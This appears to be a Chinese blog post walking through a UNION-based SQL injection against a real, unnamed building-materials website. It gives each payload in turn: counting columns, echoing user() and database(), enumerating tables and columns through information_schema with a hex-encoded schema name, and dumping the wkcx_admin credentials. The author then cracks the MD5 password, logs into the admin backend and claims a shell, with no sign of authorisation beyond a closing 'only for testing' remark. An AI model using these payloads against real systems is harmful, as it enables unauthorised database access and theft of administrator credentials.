网站:某建材网站
当我对zt字段赋值双引号的时候出现了报错,看一下报错信息
字段数
先来测试一下有多少个字段
keyword=-1&zt=1 order by 50--+
50的时候报错说明字段数小于50,下一个折半就这样 41,42没有报错,43报错了,说明总共有42个字段
测试报错在那个字段回显
ord=-1&zt=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27.28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--+
报错4,说明
在第四个字段有信息错误爆出,可以回显
keyword=-1&zt=-1%20union%20select%201,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27.28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--+
然后在第四个字段输入我们的函数信息
直接报错root权限
然后直接改user()为database()
数据库名字爆出来了----jckj
version()获取他的版本号
爆字段
keyword=-1&zt=-1%20union%20select%201,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27.28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20information_schema.tables%20where%20table_schema=%27jckj%27--+
用内置数据库information_schema然后将数据库的表名可以注入出来,因为我前面通过database()已经将数据库名字爆出来了是jckj所以可以绑定死
但是我真实进行爆的时候,并没有显示出来,他不认识jckj,这里可以用个小技巧,通过16机制编码,将“jckj”用16进制表示
keyword=-1&zt=-1%20union%20select%201,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27.28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20information_schema.tables%20where%20table_schema=0x6A636B6A--+
然后:
表顺利的爆出来了,我们肯定要查询的是管理员的表
zt=-1%20union%20select%201,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27.28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20information_schema.columns%20where%20table_schema=0x6A636B6A%20and%20table_name=0x776B63785F61646D696E--+
简简单单,出来了
因为我们知道表了,注入出来以后,我们将查询直接改为查wkcx_admin表,然后直接查admin_name admin_pwd
zt=-1%20union%20select%201,2,3,group_concat(admin_name,0x3a,admin_pwd),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27.28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20wkcx_admin--+
总结
ok,简简单单,出来了
md5加密,那我们解密一下
ok,破解成功
后台shell拿下!
试一下刚刚破解的
能够登录成功,注入完成!!!
----------已经做了脱敏处理,不会涉及隐私
仅仅是测试所用,此平台已经更换多个版本,求审稿大哥放我过申
扫一扫
1245
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
